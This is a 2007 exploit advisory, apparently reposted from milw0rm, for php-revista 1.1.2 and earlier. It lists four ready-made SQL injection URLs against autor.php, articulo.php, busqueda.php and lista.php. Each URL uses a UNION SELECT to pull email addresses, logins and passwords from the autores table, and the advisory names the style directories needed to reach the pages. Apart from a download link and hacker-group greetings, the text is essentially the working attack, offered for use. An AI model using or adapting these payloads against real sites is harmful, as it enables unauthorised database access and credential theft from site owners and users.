Security Advisory: php-revista <= 1.1.2 Remote SQL Injection Exploit

[EN] securityvulns.ru
no-pyccku

Related information
  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
  Image_Upload Script Remote File Inclusion Exploit Free Image Hosting 2.0
  Net Side Content Management System
  aspWebCalendar Remote SQL Injection Vulnerability
  LMS <= 1.8.9 Vala Remote File Inclusion Vulnerabilities

From: Cold Zero <c.o.1.d.0_(at)_hotmail.com>
Date: 25.03.2007
Subject: php-revista <= 1.1.2 Remote SQL Injection Exploit

php-revista <= 1.1.2 Remote SQL Injection Exploit

Found by & contact : Cold z3ro , cold-z3ro@hotmail.com

script :
http://downloads.sourceforge.net/php-revista/revista-1.1.2.tgz?modtime=1025654400
&big_mirror=0

Exploits :
==============================================================================
Http://www.Victem.0/revista/estilo/[STYLE]/autor.php?id_autor=-12 union select null,email,login,pwd,null,null,null,null,null,null,null,null,null from autores where id =1 /*
==============================================================================
Http://www.Victem.0/revista/estilo/[STYLE]/articulo.php?id_articulo=-12 union select null,email,login,pwd,null,null,null,null,null,null,null,null,null from
autores where id =1 /*
==============================================================================
Http://www.Victem.0/revista/estilo/[STYLE]/busqueda.php?cadena='+union select null,email,login,pwd,null,null,null,null,null,null,null,null,null from autores where id =1 /*
==============================================================================
Http://www.Victem.0/revista/estilo/[STYLE]/lista.php?email='+union select null,email,login,pwd,null,null,null,null,null,null,null,null,null from autores where id =1 /*
==============================================================================

Styles names :
/discreet/
/galveston/
/mergedidea/
/Widget_Factory/
/Digital_Multiplex/
=================================================================================
=========================================================
---- GreeTz: |MoHaNdKo| |Cold One| |Cold ThreE| |Viper Hacker| |The Wolf KSA| |o0xxdark0o| |OrGanza| |H@mLiT| |Snake12| |Root Shell|
            |Metoovit| |Fucker_net| |Rageb| |CoDeR| |HuGe| |Str0ke| |Dr.TaiGaR| |BLacK HackErD| |JEeN HacKer| |Nazy L!unx| |KURTEFENDY|
            |Spid1r Net| |Big Hacker| |Hacccr| |hacoor| || |Geniral C| |Mr.TyrAnT| |Zax| |Zooz| | Al 3afreat | |The-Falcon-Ksa|
            |The Sniper| | DearMan | |Pro Hackers| | 020 | | abdulla00 " alz3eem" | | The_Viper |Kof2002|
            All i know
=================================================================================
=========================================================

Big Thx For : www.4azhar.com , Viva My HomeLand Palestine

Print : Team Hell

# milw0rm.com [2007-03-21]

test server